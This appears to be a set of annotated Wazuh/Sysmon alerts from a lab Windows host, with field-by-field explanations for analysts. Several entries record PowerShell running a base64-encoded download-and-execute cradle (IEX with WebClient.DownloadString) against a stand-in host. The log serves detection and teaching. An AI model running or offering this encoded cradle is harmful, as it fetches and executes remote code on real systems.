CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00}
ParentProcessId: 13236
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:18.706 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13236 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 54 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534242.1395871 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:20.2262631Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283660 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:20.190
ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00}
ProcessId: 14648
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mzprdnal.c0e.ps1
CreationUtcTime: 2025-04-24 22:37:20.190
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:20.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mzprdnal.c0e.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:20.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 51 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534246.1398640 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:23.7195139Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283756 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:21.851
ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00}
ProcessId: 11516
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00}
ParentProcessId: 14648
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:21.851 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd21-680a-440b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 55 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534246.1406711 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:24.1476257Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283761 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:24.093
ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00}
ProcessId: 11516
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1
CreationUtcTime: 2025-04-24 22:37:24.093
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:24.093 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd21-680a-440b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:24.093 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 52 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534250.1409480 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:28.2950627Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283820 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:26.762
ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00}
ProcessId: 2020
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00}
ParentProcessId: 11516
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:26.762 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd26-680a-460b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\Users\Attcker1\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
